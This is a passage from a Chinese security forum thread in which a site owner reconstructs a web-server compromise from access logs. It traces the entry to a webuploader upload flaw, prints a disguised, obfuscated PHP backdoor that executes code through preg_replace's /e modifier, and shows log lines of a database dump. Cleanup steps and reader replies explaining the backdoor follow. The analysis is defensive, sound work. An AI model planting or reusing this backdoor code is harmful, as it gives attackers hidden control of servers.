59.188.72.179 - - [02/Feb/2018:13:01:51 +0800] "POST
/xxxxxx/manage/assets/lib/webuploader/0.1.5/server/preview/028bc33bdb3dba365682025c647585f4.php
HTTP/1.1" 200 817 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2926.0 Safari/537.36"
59.188.72.179
- - [02/Feb/2018:13:02:10 +0800] "POST
/xxxxxx/manage/assets/lib/webuploader/0.1.5/server/preview/028bc33bdb3dba365682025c647585f4.php
HTTP/1.1" 200 31 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2926.0 Safari/537.36"
59.188.72.179
- - [02/Feb/2018:13:02:16 +0800] "GET
/xxxxxx/manage/assets/lib/webuploader/0.1.5/server/asczxc.php HTTP/1.1"
200 3234 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100
Safari/537.36"


得知问题出在webuploader,
进而再次发现一个伪装得一本正经的马/kod/app/model/Kod.class.php
```
<?php
if (isset($_POST["\x66\x6F\x72\x75\x6d"]) && isset($_POST["\x63\x68\x65\x63\x6b"]))
{
    $__PHP_debug   = array (
        'ZendName' => '66,6f,72,75,6d',   
        'ZendPort' => '63,68,65,63,6b',
        'ZendSalt' => '2bae0d0fd9be86ee648eecafc76dd608'
    );
    $__PHP_replace = array (
        pack('H*', join('', explode(',', $__PHP_debug['ZendName']))),
        pack('H*', join('', explode(',', $__PHP_debug['ZendPort']))),
        $__PHP_debug['ZendSalt']
    );
    $__PHP_request = &$_POST;
    $__PHP_token   = md5($__PHP_request[$__PHP_replace[0]]);
   
    if ($__PHP_token === $__PHP_replace[2])
    {
        $__PHP_token = preg_replace (
            chr(47).$__PHP_token.chr(47).chr(101),
            $__PHP_request[$__PHP_replace[1]],
            $__PHP_token
        );
        
        unset (
            $__PHP_debug,
            $__PHP_replace,
            $__PHP_request,
            $__PHP_token
        );
        
        if(!defined('_DEBUG_TOKEN')) exit ('Get token fail!');
    }
}
?>
```

根据日志查找到更多了后门木马 发在文末
>
59.188.72.179 - - [02/Feb/2018:14:41:06 +0800] "GET
/xxxxxx/manage/assets/lib/webuploader/0.1.5/server/yinwenban.php?username=\***&db=\***&dump=pre_ucenter_members
HTTP/1.1" 200 36222 "<a href="http://www./***.com/xxxxxx/manage/assets/lib/webuploader/0.1.5/server/yinwenban.php?username=\***&db=\***&select=pre_ucenter_members" target="_blank">http://www.\<wbr>***.com/xxxx<wbr>xx/manage/as<wbr>sets/lib/web<wbr>uploader/0.1<wbr>.5/server/yi<wbr>nwenban.php?<wbr>username=\**<wbr>*&db=\**<wbr>*&select<wbr>=pre_ucenter<wbr>_members</a>" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"


还脱裤,可以交给网警叔叔了。

- ## 0x06 处理
删除已知后门,提取木马文件关键词 然后再次搜索一遍。
```
find /wwwroot/xxx/public_html/ -type f -name '*.php'|xargs grep '\x66\x6F\x72\x75\x6d'
```

将搜索出来的文件再次一一删除
更新完整性校验,更换数据库密码,去除uc中的后门账号,提取日志保存。

- ## 0x07 小结
感觉主要是日志和完整性校验,十分重要。上一次有碰到做黑帽seo,他们的策略就是上传多个木马隐藏,若没有完整性校验就很难找出来所有的后门。文末附件有部分木马样本。

评分

参与人数 1酒票 +5 收起 理由
管理05 + 5 欢迎加入90!

查看全部评分

大圣 发表于 2018-3-31 10:19:07 | 显示全部楼层

正式成员|主题 |帖子 |积分 113

思路清晰,学习了
80uncle 发表于 2018-4-1 23:34:49 | 显示全部楼层

九零元老|主题 |帖子 |积分 62

没发现它怎么上去的?之前留的后门上去的?
如果没有文件hash可以用ctime查找一下最近变动的文件
 楼主 许繁 发表于 2018-4-2 00:27:19 | 显示全部楼层

正式成员|主题 |帖子 |积分 106

RE: 记一次菊花被捅之后的溯源

80uncle 发表于 2018-4-1 23:34
没发现它怎么上去的?之前留的后门上去的?
如果没有文件hash可以用ctime查找一下最近变动的文件

有个组件有上传漏洞 应该就是那里 ,之前没被入侵过

Rebith 发表于 2018-4-7 17:45:00 | 显示全部楼层

正式成员|主题 |帖子 |积分 24

留个贴 收藏 牛逼了 再看
含泪的微笑 发表于 2018-4-13 09:54:51 | 显示全部楼层

正式成员|主题 |帖子 |积分 159

/kod/app/model/Kod.class.php   这个马是怎么连接的我没看懂
 楼主 许繁 发表于 2018-4-13 21:54:24 | 显示全部楼层

正式成员|主题 |帖子 |积分 106

RE: 记一次菊花被捅之后的溯源

含泪的微笑 发表于 2018-4-13 09:54
/kod/app/model/Kod.class.php   这个马是怎么连接的我没看懂

  •    $__PHP_token = preg_replace (
  •             chr(47).$__PHP_token.chr(47).chr(101),
  •             $__PHP_request[$__PHP_replace[1]],
  •             $__PHP_token
  •         );

chr 101 为e修正符 ,preg_replace 会执行 传入的代码


zjkuabjt 发表于 2018-4-17 22:31:20 | 显示全部楼层

正式成员|主题 |帖子 |积分 141

不错不错 写的很详细 厉害!
ring0ne 发表于 2018-4-18 10:53:22 | 显示全部楼层

正式成员|主题 |帖子 |积分 128

学习了,分享得不错
大饭刚 发表于 2018-4-18 11:19:22 | 显示全部楼层

正式成员|主题 |帖子 |积分 41

马子太强悍..彩笔看不懂
Aimuer 发表于 2018-4-20 14:47:18 | 显示全部楼层

正式成员|主题 |帖子 |积分 154

安骑士是神马鬼?
快速回复 返回顶部 返回列表